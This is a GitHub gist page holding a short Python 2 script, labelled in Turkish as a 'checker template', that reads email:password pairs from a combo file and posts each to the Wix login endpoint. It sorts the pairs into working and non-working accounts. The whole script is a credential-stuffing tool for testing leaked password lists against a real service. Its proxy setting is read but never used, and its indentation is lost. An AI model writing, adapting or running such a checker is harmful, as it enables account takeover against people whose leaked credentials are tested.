Skip to content

Instantly share code, notes, and snippets.

@xm4r1us
Created July 2, 2020 09:28
Show Gist options
  • Save xm4r1us/102f2c50072afdbc2c8923c7f6807599 to your computer and use it in GitHub Desktop.
Save xm4r1us/102f2c50072afdbc2c8923c7f6807599 to your computer and use it in GitHub Desktop.
#Koko Hazir Checker Kalibi
import requests
kokopolis = raw_input("Proxy \ IP ")
oku = open("combo.txt").readlines()
for lines in oku:
proxies = {
"https":kokopolis
}
combo= lines.split(":")
username = combo[0]
password = combo[1]
data={
"email":username,
"password":password,
"rememberMe":"true",
"ldSessionID":"465d2c9e-43a1-08f6-6133-22a4200d16d9",
"originView":"desktop",
"urlThatUserRedirectedFrom":"https://wix.com",
"overrideLocale":"en",
"language":"en"
}
r = requests.post("https://users.wix.com/auth/v2/login", data=data, )
if 'success":false' in r.text:
print("Not Work Account -----> "+ combo[0] + ":" + combo[1])
elif 'success":true' in r.text:
print("Work Account -----> "+ combo[0] + ":" + combo[1])
else:
print("Error -----> "+ combo[0] + ":" + combo[1])
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment